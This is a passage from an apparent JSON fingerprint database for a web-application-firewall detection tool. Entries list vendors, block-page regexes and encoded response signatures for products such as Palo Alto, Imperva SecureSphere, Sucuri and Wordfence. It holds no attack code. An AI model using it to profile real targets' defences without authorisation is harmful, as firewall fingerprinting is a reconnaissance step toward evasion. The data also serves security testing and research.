\"9c6c:RVdXum60OEhCWKpAYKYPkoJzWOpohM4JiUcMrmRWg1qQJbX3uhdOn9hsOj6hXrAA16BcPhJOdLsXo2tKaK99n+i6c4RmkgI2FZnxtDtAeq6c3qA4chS1XKTC\"\n            ]\n        },\n        \"newdefend\": {\n            \"company\": \"Newdefend\",\n            \"name\": \"Newdefend\",\n            \"regex\": \"Server: NewDefend|/nd_block/\",\n            \"signatures\": [\n                \"1ba1:RVZXu261OElCWapBYKYPk4JzWOpohM4JiUcMr2RXg1uQJLX3uhdOnthsOj+hX7AB16FcPxJPdLoXo2tKaK99n+i7c4RmkwI3FZjxtDtAeq+c36A4chW1XaTD\"\n            ]\n        },\n        \"nexusguard\": {\n            \"company\": \"Nexusguard Limited\",\n            \"name\": \"Nexusguard\",\n            \"regex\": \"speresources\\\\.nexusguard\\\\.com/wafpage/[^>]*#\\\\d{3};|<p>Powered by Nexusguard</p>\",\n            \"signatures\": [\n                \"869d:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhdOn9htOj+hX7AB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTC\"\n            ]\n        },\n        \"ninjafirewall\": {\n            \"company\": \"NinTechNet\",\n            \"name\": \"NinjaFirewall\",\n            \"regex\": \"<title>NinjaFirewall: 403 Forbidden|For security reasons?, it was blocked and logged\",\n            \"signatures\": [\n                \"2c12:RVZXum60OEhCWapBYKYPkoJzWOtohM4JiUcMr2RXg1uQJLX3uhdOn9hsOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtBeq+c3qA4chW1XaTC\"\n            ]\n        },\n        \"onmessageshield\": {\n            \"company\": \"Blackbaud\",\n            \"name\": \"onMessage Shield\",\n            \"regex\": \"This site is protected by an enhanced security system to ensure a safe browsing experience|onMessage SHIELD\",\n            \"signatures\": [\n                \"125a:RVdXum61OElCWKpAYKYPk4JzWOtohM4JiUcMr2RXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4VmkwI3FZnxtDtBeq+c36A5chW1XaTC\"\n            ]\n        },\n        \"openrasp\": {\n            \"company\": \"Blackbaud\",\n            \"name\": \"OpenRASP\",\n            \"regex\": \"400 - Request blocked by OpenRASP|https://rasp.baidu.com/blocked2?/\",\n            \"signatures\": []\n        },\n        \"paloalto\": {\n            \"company\": \"Palo Alto Networks\",\n            \"name\": \"Palo Alto\",\n            \"regex\": \"has been blocked in accordance with company policy|Palo Alto Next Generation Security Platform\",\n            \"signatures\": [\n                \"862a:RVZXum60OEhCWapAYKYPkoJyWOpohM4IiUYMr2RWg1uQJLX3uhZOnthsOj+hXrAA16BcPhJPdLoXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c3qA4chW1XKTC\",\n                \"5fe6:RVZXum60OEhCWapAYKYPkoJyWOpohM4IiUYMrmRWg1uQJLX2uhZOnthsOj+hXrAA16BcPhJPdLoXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c3qA4chW1XKTC\",\n                \"cffd:RVZXum60OEhCWapAYKYPkoJyWOpohM4IiUYMr2RWg1uQJLX3uhZOnthsOj+hXrAA16BcPhJPdLoXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chW1XKTC\",\n                \"1427:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhZOnthtOj+hXrAA16FcPhJPdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"fa37:RVZXum60OEhCWapAYKYPkoJyWOpohM4IiUYMr2RWg1uQJLX3uhZOnthsOj6hXrAA16BcPhJOdLoXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"9135:RVZXum60OEhCWapAYKYPkoJyWOpohM4IiUYMr2RWg1uQJLX3uhZOnthsOj+hXrAA16BcPhJOdLoXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c3qA4chW1XKTC\",\n                \"953a:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhZOnthsOj+hXrAA16BcPhJOdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq6c3qA4chW1XKTC\"\n            ]\n        },\n        \"perimeterx\": {\n            \"company\": \"PerimeterX\",\n            \"name\": \"PerimeterX\",\n            \"regex\": \"https://www.perimeterx.com/whywasiblocked\",\n            \"signatures\": []\n        },\n        \"profense\": {\n            \"company\": \"ArmorLogic\",\n            \"name\": \"Profense\",\n            \"regex\": \"Server: Profense\",\n            \"signatures\": [\n                \"eaee:RVZXum60OEhCWapAYKYPkoJyWOtohM4JiUcMr2RWg1uQJbX3uhdOnthsOj+hXrAB16FcPxJOdLsXo2tLaK99n+i6c4VmkwI3FZjxtDtAeq6c3qA4chS1XaTC\"\n            ]\n        },\n        \"radware\": {\n            \"company\": \"Radware\",\n            \"name\": \"AppWall\",\n            \"regex\": \"Unauthorized Request Blocked|You are seeing this page because we have detected unauthorized activity|mailto:CloudWebSec@radware\\\\.com\",\n            \"signatures\": [\n                \"e68e:RVdXu261OEhCWapBYKcPk4JzWOpohM4JiUcMr2RXg1uQJbX3uhdOn9htOj+hXrAB16FcPxJPdLsXo2tKaK99n+i7c4VmkwI3FZnxtDtAeq+c36A5chW1XaTD\",\n                \"48fa:RVdXu260OEhCWapBYKcPkoJzWOpohM4JiUYMrmRXg1uQJbX3uhdOn9hsOj+hX7AA16BcPxJOdLsXomtKaK59n+i6c4RmkgI2FZnxtDtAeq6c3qA5chW1XaTD\",\n                \"8fc4:RVdXu261OEhCWapBYKcPk4JzWOpohM4JiUcMr2RXg1uQJbX3uhdOn9htOj+hXrAB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI3FZnxtDtAeq+c36A5chW1XaTD\"\n            ]\n        },\n        \"reblaze\": {\n            \"company\": \"Reblaze\",\n            \"name\": \"Reblaze\",\n            \"regex\": \"For further information, do not hesitate to contact us\",\n            \"signatures\": [\n                \"86fb:RVZXum61OElCWKpAYKcPkoJzWOtohM4JiUcMr2RXg1uQJbX3uhdOnthsOj6hXrAB16BcPhJPdLoXo2tLaK99n+i7c4RmkgI2FZjxtDtBeq+c36A5chW1XaTD\"\n            ]\n        },\n        \"requestvalidationmode\": {\n            \"company\": \"Microsoft\",\n            \"name\": \"ASP.NET RequestValidationMode\",\n            \"regex\": \"HttpRequestValidationException|Request Validation has detected a potentially dangerous client input value|ASP\\\\.NET has detected data in the request that is potentially dangerous\",\n            \"signatures\": [\n                \"7ecd:RVdXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhdOn9htOj+hXrAA16FcPxJOdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chS1XKTC\",\n                \"919b:RVdXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhdOn9htOj+hXrAA16FcPxJOdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTD\",\n                \"14fa:RVdXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhdOn9htOj+hXrAA16FcPxJOdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chS1XaTC\",\n                \"a10d:RVdXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhdOn9htOj+hXrAA16FcPxJOdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"7564:RVdXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhdOn9htOj+hXrAA16FcPhJOdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chS1XKTC\"\n            ]\n        },\n        \"rsfirewall\": {\n            \"company\": \"RSJoomla!\",\n            \"name\": \"RSFirewall\",\n            \"regex\": \"COM_RSFIREWALL_\",\n            \"signatures\": [\n                \"d829:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1uQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq6c3qA4chS1XaTC\"\n            ]\n        },\n        \"safe3\": {\n            \"company\": \"Safe3\",\n            \"name\": \"Safe3\",\n            \"regex\": \"Server: Safe3 Web Firewall|Safe3waf/\",\n            \"signatures\": [\n                \"1b84:RVZXum60OEhCWKpAYKYPk4JyWOpohM4IiUYMr2RWg1uQJbX2uhdOnthtOj+hX7AB16FcPhJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\"\n            ]\n        },\n        \"safedog\": {\n            \"company\": \"Safedog\",\n            \"name\": \"Safedog\",\n            \"regex\": \"Server: Safedog|safedogsite/broswer_logo\\\\.jpg|404\\\\.safedog\\\\.cn/sitedog_stat\\\\.html|404\\\\.safedog\\\\.cn/images/safedogsite/head\\\\.png\",\n            \"signatures\": [\n                \"0ee1:RVdXu261OEhCWapBYKcPk4JzWOpohM4JiUcMr2RXg1uQJbX3uhdOn9htOj+hX7AA16FcPhJOdLoXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTD\",\n                \"28a0:RVZXu261OEhCWapBYKcPk4JzWOpohM4IiUcMr2RXg1uQJbX3uhdOnthsOj+hX7AA16FcPhJOdLoXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chS1XKTC\",\n                \"90fa:RVZXu261OEhCWapBYKcPk4JzWOpohM4JiUcMr2RXg1uQJbX3uhdOnthtOj+hX7AA16FcPhJOdLoXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTD\"\n            ]\n        },\n        \"safeline\": {\n            \"company\": \"Chaitin Tech\",\n            \"name\": \"SafeLine Next Gen WAF\",\n            \"regex\": \"<!\\\\-\\\\- event_id: [0-9a-f]{32} \\\\-\\\\->\",\n            \"signatures\": []\n        },\n        \"secureentry\": {\n            \"company\": \"United Security Providers\",\n            \"name\": \"Secure Entry Server\",\n            \"regex\": \"Server: Secure Entry Server\",\n            \"signatures\": [\n                \"6249:RVZXum60OEhCWKpAYKYPk4JzWOpohM4IiUcMr2RWg1uQJbX3uhdOn9htOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\"\n            ]\n        },\n        \"secureiis\": {\n            \"company\": \"BeyondTrust\",\n            \"name\": \"SecureIIS Web Server Security\",\n            \"regex\": \"//www\\\\.eeye\\\\.com/SecureIIS/|\\\\?subject=[^>]*SecureIIS Error|SecureIIS[^<]+Web Server Protection\",\n            \"signatures\": [\n                \"b43e:RVZXum60OEhCWKpAYKYPkoJzWOtohM4IiUcMrmRWg1qQJbX3uhdOnthsOj+hX7AB16BcPhJOdLoXo2tKaK99n+i6c4VmkwI3FZnxtDtBeq6c36A4chS1XaTC\",\n                \"71c7:RVZXum61OElCWKpAYKYPk4JyWOpohc4IiUYMr2RWg1uQJbX2uhdOnthtOj+hXrAB16FcPhJOdLoXo2tLaK99nui7c4RmkwI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"f2ed:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJbX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui6c4VmkwI3FZjxtDtAeq6c36A4chS1XaTC\"\n            ]\n        },\n        \"secupress\": {\n            \"company\": \"SecuPress\",\n            \"name\": \"SecuPress\",\n            \"regex\": \"<h1>SecuPress</h1><h2>\\\\d{3}\",\n            \"signatures\": [\n                \"bcb4:RVZXum60OEhCWKpAYKYPkoJyWOpohc4IiUYMr2RWg1uQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\"\n            ]\n        },\n        \"shieldsecurity\": {\n            \"company\": \"One Dollar Plugin\",\n            \"name\": \"Shield Security\",\n            \"regex\": \"Something in the URL, Form or Cookie data wasn't appropriate\",\n            \"signatures\": [\n                \"e41d:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RWg1uQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTD\",\n                \"389c:RVZXum61OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RWg1uQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTD\",\n                \"a79a:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RWg1uQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chS1XKTD\"\n            ]\n        },\n        \"securesphere\": {\n            \"company\": \"Imperva\",\n            \"name\": \"SecureSphere\",\n            \"regex\": \"<H2>Error</H2>.+?#FEEE7A.+?<STRONG>Error</STRONG>|Contact support for additional information.<br/>The incident ID is: (\\\\d{19}|N/A)\",\n            \"signatures\": [\n                \"c055:RVZXum60OEhCWapAYKYPkoJzWOpohM4JiUcMr2RWg1uQJbX2uhZOnthsOj+hX7AB16FcPxJPdLoXomtKaK59n+i6c4RmkgI2FZjxtDtAeq+c36A4chS1XaTC\",\n                \"f460:RVZXum60OEhCWapBYKYPk4JzWOtohM4JiUcMr2RWg1uQJbX3uhdOnthtOj+hXrAB16FcPxJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq+c36A4chS1XaTC\",\n                \"9113:RVZXum60OEhCWapBYKYPk4JzWOtohM4JiUcMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq+c36A4chS1XaTC\",\n                \"dc2c:RVZXum60OEhCWapBYKYPk4JzWOtohM4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq+c36A4chS1XaTC\",\n                \"599d:RVZXum60OEhCWapBYKYPk4JzWOtohM4JiUcMr2RWg1uQJbX3uhdOnthtOj+hXrAB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\",\n                \"a86e:RVZXum60OEhCWapBYKYPk4JyWOtohM4JiUcMr2RWg1uQJbX3uhdOnthtOj+hXrAB16FcPxJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq+c36A4chS1XaTC\",\n                \"81ca:RVZXum60OEhCWapBYKYPk4JzWOtohM4IiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\"\n            ]\n        },\n        \"siteground\": {\n            \"company\": \"SiteGround\",\n            \"name\": \"SiteGround\",\n            \"regex\": \"The page you are trying to access is restricted due to a security rule|Our system thinks you might be a robot!|/.well-known/captcha/\",\n            \"signatures\": [\n                \"da25:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA5chW1XKTC\"\n            ]\n        },\n        \"siteguard\": {\n            \"company\": \"JP-Secure\",\n            \"name\": \"SiteGuard\",\n            \"regex\": \"Powered by SiteGuard|The server refuse to browse the page\",\n            \"signatures\": [\n                \"6e49:RVZXum61OElCWapBYKcPk4JzWOtohM4JiUYMr2RWg1qQJbX3uhdOnthtOj+hX7AB16FcPhJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"9839:RVZXum61OElCWapBYKcPk4JzWOtohM4JiUYMr2RWg1qQJbX3uhdOnthtOj+hX7AB16FcPhJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq6c36A4chS1XaTC\",\n                \"bc2d:RVZXum61OElCWapBYKcPk4JzWOtohM4JiUYMr2RWg1qQJLX3uhdOnthtOj+hX7AB16FcPhJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\"\n            ]\n        },\n        \"sitelock\": {\n            \"company\": \"SiteLock\",\n            \"name\": \"TrueShield\",\n            \"regex\": \"SiteLock Incident ID|SiteLock will remember you and will not show this page again|<span class=\\\\\\\"value INCIDENT_ID\\\\\\\">\",\n            \"signatures\": [],\n            \"note\": \"Uses Incapsula (Reference: https://www.whitefirdesign.com/blog/2016/11/08/more-evidence-that-sitelocks-trueshield-web-application-firewall-is-really-incapsulas-waf/)\"\n        },\n        \"sniper\": {\n            \"company\": \"Wins\",\n            \"name\": \"Sniper\",\n            \"regex\": \"document\\\\.title = [^;]+Sniper WAF\",\n            \"signatures\": []\n        },\n        \"sonicwall\": {\n            \"company\": \"Dell\",\n            \"name\": \"SonicWALL\",\n            \"regex\": \"Server: SonicWALL|(?s)<title>Web Site Blocked</title>.+?nsa_banner\",\n            \"signatures\": [\n                \"f85c:RVZXum61OElCWKpAYKYPkoJyWOpohM4IiUYMr2RWg1qQJLX2uhZOnthsOj+hX7AA16FcPxJPdLoXo2tLaK99nui7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTD\"\n            ]\n        },\n        \"sophos\": {\n            \"company\": \"Sophos\",\n            \"name\": \"UTM Web Protection\",\n            \"regex\": \"Powered by UTM Web Protection\",\n            \"signatures\": []\n        },\n        \"squarespace\": {\n            \"company\": \"Squarespace\",\n            \"name\": \"Squarespace\",\n            \"regex\": \"(?s) @ .+?BRICK-50\",\n            \"signatures\": [\n                \"b012:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"4381:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhZOn9hsOj6hXrAA16BcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\"\n            ]\n        },\n        \"stackpath\": {\n            \"company\": \"StackPath\",\n            \"name\": \"StackPath\",\n            \"regex\": \"You performed an action that triggered the service and blocked your request\",\n            \"signatures\": [\n                \"5ab0:RVZXum60OEhCWKpAYKYPkoJzWOpohM4JiUYMr2RWg1uQJbX2uhdOn9hsOj+hXrAA16FcPhJOdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTD\",\n                \"7e0a:RVZXum60OEhCWKpAYKYPkoJzWOpohM4JiUYMr2RWg1uQJbX2uhdOn9htOj+hXrAA16FcPxJOdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTD\"\n            ]\n        },\n        \"sucuri\": {\n            \"company\": \"Sucuri\",\n            \"name\": \"Sucuri\",\n            \"regex\": \"Access Denied - Sucuri Website Firewall|Sucuri WebSite Firewall - CloudProxy - Access Denied|Questions\\\\?.+cloudproxy@sucuri\\\\.net\",\n            \"signatures\": [\n                \"60a9:RVZXum61OElCWapAYKYPk4JzWOpohM4JiUYMr2RXg1uQJbX3uhdOn9htOj+hXrAB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI2FZjxtDtAeq+c36A5chW1XaTC\"\n            ]\n        },\n        \"tencent\": {\n            \"company\": \"Tencent Cloud Computing\",\n            \"name\": \"Tencent Cloud|Waterproof Wall\",\n            \"regex\": \"waf\\\\.tencent-cloud\\\\.com|window.location.href=.https://waf.tencent.com/501page.html\",\n            \"signatures\": [\n                \"3f82:RVZXum60OEhCWapBYKcPk4JzWOpohM4IiUYMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99nui7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTD\"\n            ]\n        },\n        \"tmg\": {\n            \"company\": \"Microsoft\",\n            \"name\": \"Forefront Threat Management Gateway\",\n            \"regex\": \"\",\n            \"signatures\": [\n                \"4d00:RVZXum60OEhCWKpAYKYPkoJyWOpohM4JiUYMr2RWg1qQJLX3uhdOnthsOj+hX7AB16BcPhJPdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq+c3qA4chS1XaTC\"\n            ]\n        },\n        \"urlmaster\": {\n            \"company\": \"iFinity/DotNetNuke\",\n            \"name\": \"Url Master SecurityCheck\",\n            \"regex\": \"UrlRewriteModule\\\\.SecurityCheck|X-UrlMaster-(Debug|Ex):\",\n            \"signatures\": [\n                \"ddd8:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq6c3qA4chS1XaTC\"\n            ]\n        },\n        \"urlscan\": {\n            \"company\": \"Microsoft\",\n            \"name\": \"UrlScan\",\n            \"regex\": \"Rejected-By-UrlScan\",\n            \"signatures\": [\n                \"0294:RVdXum60OEhCWKpAYKYPk4JyWOpohM4IiUYMrmRXg1qQJLX2uhdOn9htOj+hXrAB16FcPxJOdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chS1XKTC\"\n            ]\n        },\n        \"vfw\": {\n            \"company\": \"OWASP\",\n            \"name\": \"Varnish Firewall\",\n            \"regex\": \"Request rejected by xVarnish-WAF\",\n            \"signatures\": []\n        },\n        \"virusdie\": {\n            \"company\": \"Virusdie LLC\",\n            \"name\": \"Virusdie\",\n            \"regex\": \"Virusdie</title>|http://cdn\\\\.virusdie\\\\.ru/splash/firewallstop\\\\.png|<meta name=\\\\\\\"FW_BLOCK\\\\\\\"\",\n            \"signatures\": []\n        },\n        \"vsf\": {\n            \"company\": \"Varnish Cache Project\",\n            \"name\": \"Varnish Security Firewall\",\n            \"regex\": \"<title>403 Naughty, not nice!</title>\",\n            \"signatures\": [\n                \"26fa:RVZXum60OEhCWKpAYKYPkoJyWOpohM4JiUcMr2RXg1qQJLX3uhZOnthsOj+hXrAA16FcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTD\"\n            ]\n        },\n        \"wallarm\": {\n            \"company\": \"Wallarm\",\n            \"name\": \"Wallarm\",\n            \"regex\": \"Server: nginx-wallarm\",\n            \"signatures\": [\n                \"c02b:RVZXu261OElCWapBYKcPk4JzWOpohM4JiUcMr2RWg1uQJbX3uhdOnthsOj+hXrAB16FcPxJOdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\"\n            ]\n        },\n        \"wapples\": {\n            \"company\": \"Penta Security\",\n            \"name\": \"Wapples\",\n            \"regex\": \"\",\n            \"signatures\": [\n                \"60b7:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1uQJLX2uhZOnthtOj+hXrAA16FcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chW1XKTC\"\n            ]\n        },\n        \"watchguard\": {\n            \"company\": \"WatchGuard Technologies\",\n            \"name\": \"WatchGuard\",\n            \"regex\": \"Server: WatchGuard|Request denied by WatchGuard Firewall\",\n            \"signatures\": [\n                \"4f4f:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RWg1uQJLX2uhZOnthsOj+hXrAA16FcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\",\n                \"2a3c:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RXg1uQJLX2uhZOnthsOj+hX7AA16FcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\",\n                \"aa64:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RXg1uQJLX2uhZOnthsOj+hX7AA16FcPhJOdLoXomtKaK59nui7c4RmkgI3FZjxtDtAeq+c3qA4chW1XaTC\"\n            ]\n        },\n        \"webarx\": {\n            \"company\": \"WebARX\",\n            \"name\": \"WebARX\",\n            \"regex\": \"/wp-content/plugins/webarx/includes/|This request has been blocked by.+?>WebARX<\",\n            \"signatures\": []\n        },\n        \"webknight\": {\n            \"company\": \"AQTRONIX\",\n            \"name\": \"WebKnight\",\n            \"regex\": \"WebKnight Application Firewall Alert|AQTRONIX WebKnight|HTTP Error 999\\\\.0 - AW Special Error\",\n            \"signatures\": [\n                \"80f9:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJbX2uhdOnthtOj+hXrAB16FcPhJPdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"73e5:RVZXum60OEhCWKpAYKYPk4JyWOtohM4JiUcMrmRXg1uQJbX3uhZOnthsOj6hX7AA16BcPhJOdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq6c3qA4chS1XaTC\",\n                \"d0f0:RVdXum60OEhCWKpAYKYPk4JyWOtohM4JiUcMrmRXg1uQJbX3uhdOn9htOj+hX7AA16FcPxJOdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chS1XKTC\",\n                \"f0c3:RVZXum61OElCWKpAYKYPk4JyWOtohM4JiUcMr2RXg1uQJbX3uhZOnthsOj6hX7AA16BcPhJOdLoXo2tKaK59n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"6763:RVZXum61OElCWKpAYKYPk4JzWOtohM4JiUcMr2RXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"7701:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJbX2uhdOn9htOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"902b:RVdXum60OEhCWKpAYKYPk4JyWOpohM4IiUYMrmRXg1qQJbX2uhdOn9htOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"4d4d:RVdXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJbX2uhdOn9htOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chS1XKTC\",\n                \"17a8:RVZXum60OEhCWKpAYKYPkoJyWOpohM4JiUcMrmRXg1qQJbX3uhdOnthtOj+hXrAB16FcPhJPdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq+c3qA4chS1XKTC\"\n            ]\n        },\n        \"webland\": {\n            \"company\": \"WebLand\",\n            \"name\": \"WebLand\",\n            \"regex\": \"Server: Apache Protected by Webland WAF\",\n            \"signatures\": [\n                \"4ba0:RVZXum60OEhCWKpAYKYPkoJzWOpohc4IiUYMr2RWg1uQJLX3uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\"\n            ]\n        },\n        \"webseal\": {\n            \"company\": \"IBM\",\n            \"name\": \"WebSEAL\",\n            \"regex\": \"(?i)Server: WebSEAL|This is a WebSEAL error message template file|The Access Manager WebSEAL server received an invalid HTTP request\",\n            \"signatures\": [\n                \"0338:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhZOnthtOj+hXrAA16FcPhJOdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\"\n            ]\n        },\n        \"webtotem\": {\n            \"company\": \"WebTotem\",\n            \"name\": \"WebTotem\",\n            \"regex\": \"The current request was blocked by.+?>WebTotem<\",\n            \"signatures\": []\n        },\n        \"wordfence\": {\n            \"company\": \"Defiant\",\n            \"name\": \"Wordfence\",\n            \"regex\": \"Generated by Wordfence|This response was generated by Wordfence|broke one of the Wordfence (advanced )?blocking rules|: wfWAF|/plugins/wordfence\",\n            \"signatures\": [\n                \"d04a:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJLX2uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA4chW1XaTC\",\n                \"26b1:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJLX2uhdOnthtOj+hXrAA16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA4chW1XaTC\",\n                \"09cf:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJLX2uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtBeq6c3qA4chW1XaTC\",\n                \"1834:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RXg1uQJLX3uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c36A4chW1XaTC\",\n                \"d38c:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJLX2uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkwI3FZjxtDtAeq6c3qA4chW1XaTC\",\n                \"d5bb:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1uQJLX2uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA4chW1XaTC\",\n                \"3f1c:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJLX2uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTD\",\n                